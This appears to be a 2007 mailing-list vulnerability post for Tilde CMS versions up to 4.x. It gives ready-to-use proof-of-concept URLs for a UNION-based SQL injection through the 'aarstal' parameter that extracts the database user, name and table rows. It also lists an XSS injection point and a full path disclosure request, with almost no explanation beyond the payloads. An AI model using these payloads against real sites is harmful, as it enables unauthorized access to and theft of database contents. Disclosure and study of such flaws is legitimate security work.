Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection Nov 26 2007 07:06PM
kingoftheworld92 fastwebnet it
---------------------------------------------------------------

____ __________ __ ____ __

/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_

| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __ | | | \ | |/ \ \___| | /_____/ | || |

|___|___| /\__| /______ /\___ >__| |___||__|

\/\______| \/ \/

---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------

PoC

D'u need an explanation?!? i don't think so :P

---------------------------------------------------------------

SQL Injection

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai
l&aarstal=%27

Little examples

Using user() and database() functions u can get some informations about the database...as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai
l&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some recordes by the database like:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai
l&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/
**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P

---------------------------------------------------------------

something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai
l&aarstal=[XSS]

---------------------------------------------------------------

Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&t
ss=on&linier=on

---------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus